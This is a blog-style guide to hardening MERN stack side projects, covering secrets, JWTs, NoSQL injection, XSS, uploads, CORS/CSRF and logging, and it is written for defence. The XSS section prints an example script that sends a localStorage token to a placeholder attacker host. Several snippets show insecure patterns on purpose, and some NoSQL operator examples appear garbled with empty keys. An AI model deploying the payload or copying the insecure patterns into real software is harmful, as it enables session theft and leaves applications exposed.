
From MERN to Secure MERN: How to Stop Getting Hacked in Your Side Projects
If you've built more than one MERN side project, there's a high chance at least one of them is quietly vulnerable right now.
Not because you're "bad at security", but because most tutorials simply don't care.
They teach you how to make things work.
Attackers only care about how to make things break.
In this post, I'll walk through how a normal MERN stack turns into a Secure MERN stack, using real-world mistakes I keep seeing in student projects, portfolio apps, and even production startups.
I'll keep it practical: what you're probably doing today, how it can be abused, and what you should do instead.
1. Environment variables: Stop leaking your secrets to GitHub
The usual MERN reality
Typical .env setup in a side project:
- You hardcode secrets in the code during dev.
- You later move them to
.envbut you:- Forget to add
.envto.gitignore, or - Commit
.envonce "by mistake", then delete it later thinking it's gone, or - Put secrets in
config.jsand import that everywhere.
- Forget to add
Result: your MongoDB URI, JWT secret, Cloudinary keys, and even SMTP passwords end up in a public repo at least once.
Attackers actively scan GitHub for this. They don't need to target you personally; they just search for patterns like mongodb+srv:// or AIzaSy (Google API prefix) and farm credentials.
What can go wrong?
- Your MongoDB is exposed to the internet with a weak or no IP whitelist.
- An attacker connects directly, dumps your entire user database, and maybe even deletes it.
- If you reuse the same password elsewhere, they pivot.
What to actually do
- Always have
.envin.gitignorefrom day zero. - Never commit secrets, even once. Git history keeps them unless you rewrite history.
- Use different secrets per environment (local, staging, production).
- For serious deployments: use environment variable stores (Railway, Render, Vercel, AWS Parameter Store, etc.) instead of
.envfiles lying around on random servers.
A quick rule: If your app needs it to talk to a third-party service or sign tokens, consider it secret. It should not live in your source code.
2. JWT and auth: Tokens are not just base64 strings
The usual MERN reality
Most MERN tutorials do something like this:
- User logs in with email/password.
- Server generates a JWT with
_id, maybeemail, signs it with a hardcodedJWT_SECRETlike"mysecret"and returns it. - Frontend stores the token in
localStorageand sends it inAuthorization: Bearer <token>for protected routes.
Done. Auth.
In real life, this is very breakable.
What can go wrong?
-
Weak or guessable JWT secret
If your secret is short or in the code, someone with the token can brute-force the secret and forge valid tokens. -
No expiry or long expiry
Tokens that never expire mean:- A stolen laptop = permanent account compromise.
- A leaked token in logs or screenshots = long-term access.
-
LocalStorage + XSS = game over
If you have any XSS vulnerability (more on this later), an attacker can grab your token fromlocalStorageand send it to their server.
What to actually do
- Use a long, random JWT secret stored in environment variables.
- Always set a reasonable expiry (like 15 minutes–1 hour for access tokens).
- Consider:
- Access token (short-lived) + refresh token pattern.
- HTTP-only cookies for tokens (prevents JavaScript from reading them, mitigating token theft via XSS).
- On logout or password change:
- Invalidate or rotate tokens server-side when possible (e.g., track token version in DB).
A simple upgrade: store JWT in an HTTP-only cookie, and use CSRF protection alongside it. That alone raises the bar massively for casual attacks.
3. MongoDB queries: How your filters become injection points
The usual MERN reality
A typical Node + MongoDB route:
// Find user by email
const user = await User.findOne({ email: req.body.email });
Looks harmless, right?
The problem starts when you allow clients to send arbitrary filters or sort options.
Example:
// Dangerously trusting client input
const users = await User.find(req.body.filter);
If req.body.filter is something like:
{ "role": { "": "admin" } }
That might be okay.
But if you accidentally allow operators like `` or just pass unchecked JSON into queries, you're asking for trouble.
What can go wrong?
- NoSQL injection: attacker sends crafted query objects to bypass checks or exfiltrate more data than intended.
- If you use
eval-like features (`` with JS expressions), it's even worse.
What to actually do
- Strictly validate and sanitize input before it reaches Mongo queries.
- Use schemas and validation with tools like Joi, Zod, or built-in Mongoose validation:
- Explicitly specify allowed fields.
- Reject unexpected keys and operators.
- Never allow raw objects from the client to be passed directly into
find,update, etc.
A good mindset: Your API decides the shape of filters, not the frontend.
E.g., accept explicit query params: ?role=user&limit=10&page=2 instead of sending arbitrary JSON filters.
4. XSS: Your React app is not magically safe
The usual MERN reality
Many devs think: "I use React, so I'm safe from XSS."
Then they do this:
<div dangerouslySetInnerHTML={{ __html: userContent }} />
Or they show user-generated content from a rich text editor or markdown renderer without proper sanitization.
What can go wrong?
If userContent contains:
<script>
fetch('https://attacker.com/steal?token=' + localStorage.getItem('token'))
</script>
Then any user visiting that page runs that script.
Tokens, cookies (if not HTTP-only), and any accessible data can be exfiltrated.
Even if you never use dangerouslySetInnerHTML, third-party components and markdown renderers can still be misconfigured and vulnerable.
What to actually do
- Avoid
dangerouslySetInnerHTMLunless you absolutely must use it. - When you must render HTML or markdown:
- Use a sanitization library (DOMPurify for React, for example).
- Strip or escape scripts, inline event handlers,
javascript:URLs, etc.
- Treat any content that came from a user or external source as hostile until sanitized.
Rule of thumb: if the browser is going to interpret it as HTML, you sanitize it.
5. File uploads: Your image upload route is a landmine
The usual MERN reality
You add image upload for profile pictures or blog covers using multer or similar:
- Accept a file.
- Save it to
/uploads. - Store its path in MongoDB.
- Serve it statically.
You've just opened an attack surface that can go very wrong if you're not careful.
What can go wrong?
- An attacker uploads a
.php,.js, or some other executable file and manages to get it executed (more common in PHP stacks, but still dangerous logic-wise). - Uploading extremely large files to cause disk or memory issues (DoS).
- Uploading files with HTML/JS and then having them served as text/html.
What to actually do
- Validate:
- File type (MIME type and extension, but don't trust just the extension).
- File size (limit to something sane like 2–5 MB for images).
- Store user uploads on:
- Object storage (S3, Cloudinary, etc.) instead of your app server's file system.
- Serve them from a different domain or subdomain if possible (to limit attacks via cookies or scripts).
- Never execute or interpret user-uploaded files as code.
For portfolio projects, using Cloudinary or similar is easy and dramatically safer than rolling your own file hosting.
6. CORS, cookies, and CSRF: Your frontend and backend are in a relationship… and it's complicated
The usual MERN reality
A common pattern:
- Backend on
http://localhost:5000 - Frontend on
http://localhost:3000
You quickly add:
app.use(cors({ origin: 'http://localhost:3000', credentials: true }));
Then in production, you change it to something like:
origin: '*'
because "CORS errors are annoying".
What can go wrong?
- Wildcard CORS (
*) with credentials is not allowed, but misconfigurations around CORS often result in the API being callable from anywhere. - If you rely on cookies for auth and don't use CSRF protection, a user logged into your app can be tricked into making state-changing requests (like changing email, password, or deleting data) via a malicious page.
What to actually do
- For CORS:
- Whitelist only the domains you actually own.
- Avoid
*for anything involving auth.
- For cookies:
- Use
HttpOnly,Secure, andSameSiteflags appropriately.
- Use
- For CSRF protection:
- Use CSRF tokens for state-changing operations if you rely on cookies.
- Or use double-submit cookie or other standard patterns.
The goal: only your trusted frontend should be able to perform sensitive actions on behalf of the user.
7. Logging, error handling, and "please don't leak your stack trace"
The usual MERN reality
In dev, you send detailed error messages back to the frontend so you can debug quickly:
res.status(500).json({ error: err.message, stack: err.stack });
Then you forget to change this in production.
Or you log sensitive data (passwords, tokens, OTPs) to the console or a logging service.
What can go wrong?
- Users (and attackers) see:
- Your stack traces.
- File paths.
- Internal logic details.
- Logs can become a goldmine of:
- Tokens.
- Secrets.
- Personally identifiable information (PII).
What to actually do
- Separate error responses:
- Dev: detailed logs locally.
- Prod: generic user-facing error messages, detailed logs only on the server side (not sent to clients).
- Redact sensitive fields before logging.
- Centralize logs if possible, but always treat logs as sensitive data.
If an attacker sees your stack traces and query failures, they can often pivot to find even more weaknesses.
8. A simple mental model: Secure MERN as a checklist
When you're building side projects, you don't need "perfect" security.
You need non-trivial security — enough that a random person or bot doesn't pwn your app in 5 minutes.
Here's a quick Secure MERN checklist you can gradually adopt:
- Secrets:
- All secrets in environment variables, never in Git.
- Auth:
- Strong JWT secret, expiry, and preferably HTTP-only cookies.
- Input:
- Validate and sanitize all user input, especially anything touching queries.
- Frontend:
- No unsafe HTML rendering without sanitization.
- Uploads:
- Validate file type/size, use external storage.
- CORS & CSRF:
- Strict origins, CSRF protection when using cookies.
- Errors & logs:
- No sensitive info in responses, careful logging.
Pick one project you've already built and audit it using this list.
You'll probably find at least 3–5 things you can fix in under an hour — and that's your upgrade from "MERN" to "Secure MERN".
Final thoughts
Security isn't something you "add at the end".
It's more like code style: the earlier you internalize it, the less painful your future will be.
You don't need to become a full-time security engineer to build safer apps.
You just need to stop doing a few very common, very fixable things.
If you want, send me one of your existing MERN projects (repo or tech stack + features), and I can walk you through a mini threat-model + fix list tailored to your app.